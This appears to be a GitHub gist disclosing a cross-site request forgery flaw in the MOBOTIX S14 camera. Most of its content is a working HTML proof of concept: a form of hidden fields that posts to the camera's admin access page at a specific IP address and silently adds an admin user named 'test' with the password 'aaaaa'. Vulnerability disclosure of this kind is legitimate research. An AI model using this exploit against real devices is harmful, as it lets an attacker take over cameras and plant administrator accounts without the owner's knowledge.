Created May 29, 2019
| Summary | |
| The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery (CSRF) attacks. | |
| Impact | |
| Successful exploitation of this vulnerability can lead to the takeover of the device. | |
| Deatils | |
| The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery attacks. | |
| This can lead to allow a local account password to be changed without the knowledge of the authenticated user. | |
| POC - the following PoC will add a test user, with a password of 'aaaaa'. Note, this user has admin priviledges. | |
| <html> | |
| <body> | |
| <form method="POST" action="http://82.71.22.180:8001/admin/access"> | |
| <input type="hidden" name="user_name_0" value="admin"/> | |
| <input type="hidden" name="user_group_0" value="admins"/> | |
| <input type="hidden" name="user_passwd_a_0" value="***"/> | |
| <input type="hidden" name="user_passwd_b_0" value="***"/> | |
| <input type="hidden" name="user_name_1" value="rayspeed"/> | |
| <input type="hidden" name="user_group_1" value="users"/> | |
| <input type="hidden" name="user_passwd_a_1" value="***"/> | |
| <input type="hidden" name="user_passwd_b_1" value="***"/> | |
| <input type="hidden" name="user_name_2" value="test"/> | |
| <input type="hidden" name="user_group_2" value="admins"/> | |
| <input type="hidden" name="user_passwd_a_2" value="aaaaa"/> | |
| <input type="hidden" name="user_passwd_b_2" value="aaaaa"/> | |
| <input type="hidden" name="sv_passwd_a" value=""/> | |
| <input type="hidden" name="sv_passwd_b" value=""/> | |
| <input type="hidden" name="save_config" value="Set"/> | |
| <input type="submit" value="Submit"> | |
| </form> | |
| </body> | |
| <html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment